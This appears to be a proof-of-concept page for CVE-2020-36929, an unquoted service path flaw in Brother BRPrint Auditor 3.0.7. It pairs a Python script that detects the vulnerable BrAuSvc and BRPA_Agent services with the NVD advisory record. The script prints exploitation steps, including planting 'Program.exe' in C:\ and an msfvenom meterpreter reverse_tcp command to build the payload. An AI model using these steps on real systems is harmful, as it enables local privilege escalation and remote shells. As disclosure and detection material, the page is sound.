CVE-2020-36929

#!/usr/bin/env python3 # CVE-2020-36929 PoC - Brother BRPrint Auditor Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability # Attackers can place a malicious executable in an intermediate directory import os import sys import subprocess def check_unquoted_paths(): """Check for unquoted service paths in Windows services""" services = ['BrAuSvc', 'BRPA_Agent'] vulnerable_services = [] try: # Query Windows services for executable paths result = subprocess.check_output( ['wmic', 'service', 'get', 'name,pathname', '/format:csv'], text=True ) for service in services: if service.lower() in result.lower(): for line in result.split('\n'): if service.lower() in line.lower() and 'pathname' not in line: if '"' not in line.split(',')[-1]: vulnerable_services.append({ 'service': service, 'path': line.split(',')[-1].strip() }) except Exception as e: print(f"Error checking services: {e}") return vulnerable_services def create_malicious_executable(target_path): """Generate a malicious executable to place in the vulnerable path""" print(f"[*] Vulnerable path detected: {target_path}") print(f"[*] To exploit, create a malicious executable in the intermediate directory") print(f"[*] Example: Place 'Program.exe' in C:\\ to exploit 'C:\\Program Files\\...\\BrAuSvc.exe'") print(f"[*] Generate payload with: msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o Program.exe") def main(): print("=" * 60) print("CVE-2020-36929 - Brother BRPrint Auditor Unquoted Service Path") print("=" * 60) vulnerable = check_unquoted_paths() if vulnerable: print(f"\n[!] Found {len(vulnerable)} vulnerable service(s):\n") for v in vulnerable: print(f"Service: {v['service']}") print(f"Path: {v['path']}") create_malicious_executable(v['path']) print() else: print("\n[+] No vulnerable services found or script requires admin privileges") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2020-36929", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:20.320", "lastModified": "2026-02-09T15:02:39.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brother BRPrint Auditor 3.0.7 contains an unquoted service path vulnerability in its Windows service configurations that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted file paths in BrAuSvc and BRPA_Agent services to inject malicious executables and escalate privileges on the system."}, {"lang": "es", "value": "Brother BRPrint Auditor 3.0.7 contiene una vulnerabilidad de ruta de servicio sin comillas en sus configuraciones de servicio de Windows que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar las rutas de archivo sin comillas en los servicios BrAuSvc y BRPA_Agent para inyectar ejecutables maliciosos y escalar privilegios en el sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:brother:brprint_auditor:3.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "EE28F77B-5724-4D3C-BE62-9775AA67EB19"}]}]}], "references": [{"url": "https://support.brother.com/g/s/id/common_download/en/auditor_pro3.html?c=be&lang=fr&redirect=on", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://support.brother.com/g/s/id/common_download/en/auditor_pro3.html?c=be&lang=nl&redirect=on", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50005", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/brother-brprint-auditor-multiple-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50005", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}